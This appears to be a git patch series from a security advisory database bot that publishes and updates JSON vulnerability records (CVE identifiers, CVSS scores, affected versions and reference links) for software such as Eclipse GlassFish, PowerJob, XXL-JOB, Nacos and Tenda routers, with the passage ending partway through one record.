From 07d2720dd3d0fa09e79bba55c81303ea79f2f1a1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 17:34:56 +0000 Subject: [PATCH 001/323] Publish Advisories GHSA-mqxx-c43h-jj9v GHSA-mqxx-c43h-jj9v --- .../GHSA-mqxx-c43h-jj9v.json | 65 +++++++++++++++++++ .../GHSA-mqxx-c43h-jj9v.json | 40 ------------ 2 files changed, 65 insertions(+), 40 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json diff --git a/advisories/github-reviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json b/advisories/github-reviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json new file mode 100644 index 0000000000000..0072d391cec63 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqxx-c43h-jj9v", + "modified": "2025-07-18T17:33:33Z", + "published": "2025-07-16T12:30:22Z", + "aliases": [ + "CVE-2024-9343" + ], + "summary": "Eclipse GlassFish is vulnerable to Stored XSS attacks through its Administration Console", + "details": "In Eclipse GlassFish version 7.0.15, it is possible to perform Stored Cross-Site Scripting attacks through the Administration Console.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:H/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.glassfish.main.admingui:console-common" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "7.0.25" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9343" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eclipse-ee4j/glassfish" + }, + { + "type": "WEB", + "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/37" + }, + { + "type": "WEB", + "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/230" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T17:33:33Z", + "nvd_published_at": "2025-07-16T11:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json b/advisories/unreviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json deleted file mode 100644 index 85ace0767d525..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-mqxx-c43h-jj9v/GHSA-mqxx-c43h-jj9v.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mqxx-c43h-jj9v", - "modified": "2025-07-16T21:30:34Z", - "published": "2025-07-16T12:30:22Z", - "aliases": [ - "CVE-2024-9343" - ], - "details": "In Eclipse GlassFish version 7.0.15 is possible to perform Stored Cross-site scripting\nattacks in the Administration Console.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9343" - }, - { - "type": "WEB", - "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/37" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-16T11:15:23Z" - } -} \ No newline at end of file From 3dc1162fb46162919afcad44670631013eb4b347 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 17:47:25 +0000 Subject: [PATCH 002/323] Publish Advisories GHSA-f7h5-c625-3795 GHSA-f7h5-c625-3795 --- .../GHSA-f7h5-c625-3795.json | 65 +++++++++++++++++++ .../GHSA-f7h5-c625-3795.json | 40 ------------ 2 files changed, 65 insertions(+), 40 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json diff --git a/advisories/github-reviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json b/advisories/github-reviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json new file mode 100644 index 0000000000000..703b057788189 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7h5-c625-3795", + "modified": "2025-07-18T17:45:26Z", + "published": "2025-07-16T12:30:25Z", + "aliases": [ + "CVE-2024-9408" + ], + "summary": "Eclipse GlassFish is vulnerable to Server Side Request Forgery attacks through specific endpoints", + "details": "In Eclipse GlassFish version 6.2.5, it is possible to perform a Server Side Request Forgery attack using specific endpoints.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.glassfish.main.admingui:console-common" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "6.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9408" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eclipse-ee4j/glassfish" + }, + { + "type": "WEB", + "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/38" + }, + { + "type": "WEB", + "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T17:45:26Z", + "nvd_published_at": "2025-07-16T12:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json b/advisories/unreviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json deleted file mode 100644 index e0cbe267986c2..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-f7h5-c625-3795/GHSA-f7h5-c625-3795.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-f7h5-c625-3795", - "modified": "2025-07-16T21:30:34Z", - "published": "2025-07-16T12:30:25Z", - "aliases": [ - "CVE-2024-9408" - ], - "details": "In Eclipse GlassFish since version 6.2.5 it is possible to perform a Server Side Request Forgery attack in specific endpoints.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9408" - }, - { - "type": "WEB", - "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/38" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-16T12:15:23Z" - } -} \ No newline at end of file From a58f332fdda593a873db8697b9a65d609a3079ea Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 18:04:38 +0000 Subject: [PATCH 003/323] Publish Advisories GHSA-c6mx-3fj9-9j7q GHSA-mpvf-6h9g-2hq2 --- .../2023/04/GHSA-c6mx-3fj9-9j7q/GHSA-c6mx-3fj9-9j7q.json | 6 +++--- .../2023/04/GHSA-mpvf-6h9g-2hq2/GHSA-mpvf-6h9g-2hq2.json | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2023/04/GHSA-c6mx-3fj9-9j7q/GHSA-c6mx-3fj9-9j7q.json b/advisories/github-reviewed/2023/04/GHSA-c6mx-3fj9-9j7q/GHSA-c6mx-3fj9-9j7q.json index 3c61926ff5e67..5f78d0df8c798 100644 --- a/advisories/github-reviewed/2023/04/GHSA-c6mx-3fj9-9j7q/GHSA-c6mx-3fj9-9j7q.json +++ b/advisories/github-reviewed/2023/04/GHSA-c6mx-3fj9-9j7q/GHSA-c6mx-3fj9-9j7q.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-c6mx-3fj9-9j7q", - "modified": "2023-04-28T20:07:09Z", + "modified": "2025-07-18T18:02:32Z", "published": "2023-04-21T21:30:19Z", "aliases": [ "CVE-2023-29924" ], "summary": "PowerJob vulnerable to incorrect access control", - "details": "PowerJob V4.3.1 is vulnerable to Incorrect Access Control that allows for remote code execution.", + "details": "PowerJob v4.3.6 is vulnerable to Incorrect Access Control that allows for remote code execution.", "severity": [ { "type": "CVSS_V3", @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "4.3.1" + "last_affected": "4.3.6" } ] } diff --git a/advisories/github-reviewed/2023/04/GHSA-mpvf-6h9g-2hq2/GHSA-mpvf-6h9g-2hq2.json b/advisories/github-reviewed/2023/04/GHSA-mpvf-6h9g-2hq2/GHSA-mpvf-6h9g-2hq2.json index 5f8f06d56f987..f8ac221f13d6e 100644 --- a/advisories/github-reviewed/2023/04/GHSA-mpvf-6h9g-2hq2/GHSA-mpvf-6h9g-2hq2.json +++ b/advisories/github-reviewed/2023/04/GHSA-mpvf-6h9g-2hq2/GHSA-mpvf-6h9g-2hq2.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-mpvf-6h9g-2hq2", - "modified": "2023-05-01T16:41:14Z", + "modified": "2025-07-18T18:02:17Z", "published": "2023-04-19T12:30:21Z", "aliases": [ "CVE-2023-29921" ], "summary": "PowerJob Incorrect Access Control vulnerability", - "details": "PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create app interface.", + "details": "PowerJob v4.3.6 is vulnerable to Incorrect Access Control via the create app interface.", "severity": [ { "type": "CVSS_V3", @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "4.3.1" + "last_affected": "4.3.6" } ] } From ce62fe8018239ab84f25bd65889fb7c57c59b724 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 18:07:37 +0000 Subject: [PATCH 004/323] Publish GHSA-83w4-x5w9-hf4h --- .../2022/11/GHSA-83w4-x5w9-hf4h/GHSA-83w4-x5w9-hf4h.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2022/11/GHSA-83w4-x5w9-hf4h/GHSA-83w4-x5w9-hf4h.json b/advisories/github-reviewed/2022/11/GHSA-83w4-x5w9-hf4h/GHSA-83w4-x5w9-hf4h.json index d6c306b7ac823..227ff42b2e152 100644 --- a/advisories/github-reviewed/2022/11/GHSA-83w4-x5w9-hf4h/GHSA-83w4-x5w9-hf4h.json +++ b/advisories/github-reviewed/2022/11/GHSA-83w4-x5w9-hf4h/GHSA-83w4-x5w9-hf4h.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-83w4-x5w9-hf4h", - "modified": "2025-04-29T18:33:38Z", + "modified": "2025-07-18T18:04:13Z", "published": "2022-11-17T21:30:49Z", "aliases": [ "CVE-2022-43183" ], "summary": "XXL-JOB vulnerable to Server-Side Request Forgery (SSRF)", - "details": "XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.", + "details": "XXL-Job before v2.4.0 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.", "severity": [ { "type": "CVSS_V3", @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "2.3.1" + "fixed": "2.4.0" } ] } From f544ff6e79e2b08cee42eced944b293f55693618 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 18:10:34 +0000 Subject: [PATCH 005/323] Publish GHSA-4gr7-qw2q-jxh6 --- .../GHSA-4gr7-qw2q-jxh6.json | 37 +++++++++++++++++-- 1 file changed, 34 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2022/03/GHSA-4gr7-qw2q-jxh6/GHSA-4gr7-qw2q-jxh6.json b/advisories/github-reviewed/2022/03/GHSA-4gr7-qw2q-jxh6/GHSA-4gr7-qw2q-jxh6.json index 4f31a3c99e6b2..f9f59b2ac6423 100644 --- a/advisories/github-reviewed/2022/03/GHSA-4gr7-qw2q-jxh6/GHSA-4gr7-qw2q-jxh6.json +++ b/advisories/github-reviewed/2022/03/GHSA-4gr7-qw2q-jxh6/GHSA-4gr7-qw2q-jxh6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-4gr7-qw2q-jxh6", - "modified": "2022-03-22T21:37:08Z", + "modified": "2025-07-18T18:08:06Z", "published": "2022-03-12T00:00:27Z", "aliases": [ "CVE-2021-44667" ], "summary": "Cross-site Scripting in Nacos", - "details": "A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters.", + "details": "A Cross Site Scripting (XSS) vulnerability exists in Nacos prior to 1.4.5 and 2.1.0-BETA in auth/users via the (1) pageSize and (2) pageNo parameters.", "severity": [ { "type": "CVSS_V3", @@ -15,6 +15,25 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.alibaba.nacos:nacos-common" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0-ALPHA.1" + }, + { + "fixed": "2.1.0-BETA" + } + ] + } + ] + }, { "package": { "ecosystem": "Maven", @@ -28,7 +47,7 @@ "introduced": "0" }, { - "fixed": "2.0.4" + "fixed": "1.4.5" } ] } @@ -44,10 +63,22 @@ "type": "WEB", "url": "https://github.com/alibaba/nacos/issues/7359" }, + { + "type": "WEB", + "url": "https://github.com/alibaba/nacos/pull/7364" + }, + { + "type": "WEB", + "url": "https://github.com/alibaba/nacos/pull/8980" + }, { "type": "WEB", "url": "https://github.com/alibaba/nacos/commit/cd6d7e33b94f24814701f3faf8b632e5e85444c5" }, + { + "type": "WEB", + "url": "https://github.com/alibaba/nacos/commit/d062fcafad0acd01673d404319526415a4af372b" + }, { "type": "PACKAGE", "url": "https://github.com/alibaba/nacos" From 72dc6279ecee2e52dfe875cefa658d5baee4a491 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 18:31:51 +0000 Subject: [PATCH 006/323] Advisory Database Sync --- .../GHSA-pww2-7vc4-85mw.json | 9 ++- .../GHSA-695j-c63m-mvxc.json | 6 +- .../GHSA-24f6-xp9q-v9rc.json | 60 +++++++++++++++++++ .../GHSA-2ghx-mx8m-8w49.json | 37 ++++++++++++ .../GHSA-3m4m-v7p2-vg4g.json | 33 ++++++++++ .../GHSA-3v68-phv5-4j3p.json | 60 +++++++++++++++++++ .../GHSA-422g-xm87-cghv.json | 3 +- .../GHSA-45x8-4rg4-4ffp.json | 56 +++++++++++++++++ .../GHSA-565h-44m8-4c2v.json | 52 ++++++++++++++++ .../GHSA-65wq-rq4p-8756.json | 3 +- .../GHSA-7h6c-r5x6-jgc8.json | 33 ++++++++++ .../GHSA-7jrr-347f-8grx.json | 36 +++++++++++ .../GHSA-7mm5-2cmw-jqq7.json | 36 +++++++++++ .../GHSA-7xq7-6cv9-82h6.json | 3 +- .../GHSA-85f8-38hh-c6gj.json | 33 ++++++++++ .../GHSA-8mh7-q3x4-gpff.json | 36 +++++++++++ .../GHSA-9pf2-fmhc-rfj7.json | 56 +++++++++++++++++ .../GHSA-9vjx-8m86-3rhw.json | 3 +- .../GHSA-f5qr-822f-j6gv.json | 36 +++++++++++ .../GHSA-g8fj-q2xq-wmh6.json | 3 +- .../GHSA-jx4p-33jj-p9hw.json | 60 +++++++++++++++++++ .../GHSA-mcrv-r37f-q933.json | 3 +- .../GHSA-mhfx-j9x5-v427.json | 33 ++++++++++ .../GHSA-mqc3-2x97-gv87.json | 56 +++++++++++++++++ .../GHSA-p793-776f-vqq6.json | 3 +- .../GHSA-pfm7-x8pf-m93g.json | 3 +- .../GHSA-phc4-gw5x-84c2.json | 60 +++++++++++++++++++ .../GHSA-pr48-hfmc-f9vq.json | 33 ++++++++++ .../GHSA-rmmj-8q9v-qxh2.json | 33 ++++++++++ .../GHSA-vp3h-jvmv-7rq4.json | 36 +++++++++++ .../GHSA-w4fj-h985-2wx8.json | 60 +++++++++++++++++++ .../GHSA-wvgm-rxv8-96hh.json | 15 +++-- 32 files changed, 974 insertions(+), 15 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-24f6-xp9q-v9rc/GHSA-24f6-xp9q-v9rc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3v68-phv5-4j3p/GHSA-3v68-phv5-4j3p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-45x8-4rg4-4ffp/GHSA-45x8-4rg4-4ffp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-565h-44m8-4c2v/GHSA-565h-44m8-4c2v.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7h6c-r5x6-jgc8/GHSA-7h6c-r5x6-jgc8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7jrr-347f-8grx/GHSA-7jrr-347f-8grx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7mm5-2cmw-jqq7/GHSA-7mm5-2cmw-jqq7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-85f8-38hh-c6gj/GHSA-85f8-38hh-c6gj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8mh7-q3x4-gpff/GHSA-8mh7-q3x4-gpff.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9pf2-fmhc-rfj7/GHSA-9pf2-fmhc-rfj7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f5qr-822f-j6gv/GHSA-f5qr-822f-j6gv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jx4p-33jj-p9hw/GHSA-jx4p-33jj-p9hw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mqc3-2x97-gv87/GHSA-mqc3-2x97-gv87.json create mode 100644 advisories/unreviewed/2025/07/GHSA-phc4-gw5x-84c2/GHSA-phc4-gw5x-84c2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vp3h-jvmv-7rq4/GHSA-vp3h-jvmv-7rq4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w4fj-h985-2wx8/GHSA-w4fj-h985-2wx8.json diff --git a/advisories/unreviewed/2024/05/GHSA-pww2-7vc4-85mw/GHSA-pww2-7vc4-85mw.json b/advisories/unreviewed/2024/05/GHSA-pww2-7vc4-85mw/GHSA-pww2-7vc4-85mw.json index 22e741318a6ad..01b79e8e6c96b 100644 --- a/advisories/unreviewed/2024/05/GHSA-pww2-7vc4-85mw/GHSA-pww2-7vc4-85mw.json +++ b/advisories/unreviewed/2024/05/GHSA-pww2-7vc4-85mw/GHSA-pww2-7vc4-85mw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pww2-7vc4-85mw", - "modified": "2024-05-30T21:33:37Z", + "modified": "2025-07-18T18:30:27Z", "published": "2024-05-30T21:33:37Z", "aliases": [ "CVE-2024-5271" @@ -11,6 +11,10 @@ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], "affected": [], @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-787" + "CWE-787", + "CWE-843" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json b/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json index 8eca2dae617a0..f909fa6f6c3fd 100644 --- a/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json +++ b/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-695j-c63m-mvxc", - "modified": "2025-07-09T18:30:40Z", + "modified": "2025-07-18T18:30:27Z", "published": "2025-06-30T21:30:54Z", "aliases": [ "CVE-2025-32463" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://explore.alas.aws.amazon.com/CVE-2025-32463.html" }, + { + "type": "WEB", + "url": "https://iototsecnews.jp/2025/07/01/linux-sudo-chroot-vulnerability-enables-hackers-to-elevate-privileges-to-root" + }, { "type": "WEB", "url": "https://security-tracker.debian.org/tracker/CVE-2025-32463" diff --git a/advisories/unreviewed/2025/07/GHSA-24f6-xp9q-v9rc/GHSA-24f6-xp9q-v9rc.json b/advisories/unreviewed/2025/07/GHSA-24f6-xp9q-v9rc/GHSA-24f6-xp9q-v9rc.json new file mode 100644 index 0000000000000..9a61b69648621 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-24f6-xp9q-v9rc/GHSA-24f6-xp9q-v9rc.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24f6-xp9q-v9rc", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7792" + ], + "details": "A vulnerability was found in Tenda FH451 1.0.0.9. It has been rated as critical. This issue affects the function formSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7792" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/formSafeEmailFilter.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/formSafeEmailFilter.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316853" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316853" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616316" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json b/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json new file mode 100644 index 0000000000000..ab3b10e0a7be6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2ghx-mx8m-8w49/GHSA-2ghx-mx8m-8w49.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2ghx-mx8m-8w49", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-50586" + ], + "details": "StudentManage v1.0 was discovered to contain Cross-Site Request Forgery (CSRF).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50586" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/1" + }, + { + "type": "WEB", + "url": "https://gitee.com/DayCloud/student-manage" + }, + { + "type": "WEB", + "url": "http://studentmanage.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json b/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json new file mode 100644 index 0000000000000..efa6a52779e03 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3m4m-v7p2-vg4g/GHSA-3m4m-v7p2-vg4g.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m4m-v7p2-vg4g", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-45156" + ], + "details": "Splashin iOS v2.0 fails to enforce server-side interval restrictions for location updates for free-tier users.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45156" + }, + { + "type": "WEB", + "url": "https://carterlasalle.github.io/splashin-cve-2025/splashin-1.pdf" + }, + { + "type": "WEB", + "url": "http://splashin.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3v68-phv5-4j3p/GHSA-3v68-phv5-4j3p.json b/advisories/unreviewed/2025/07/GHSA-3v68-phv5-4j3p/GHSA-3v68-phv5-4j3p.json new file mode 100644 index 0000000000000..0073498a2e84a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3v68-phv5-4j3p/GHSA-3v68-phv5-4j3p.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3v68-phv5-4j3p", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7795" + ], + "details": "A vulnerability, which was classified as critical, has been found in Tenda FH451 1.0.0.9. Affected by this issue is the function fromP2pListFilter of the file /goform/P2pListFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": 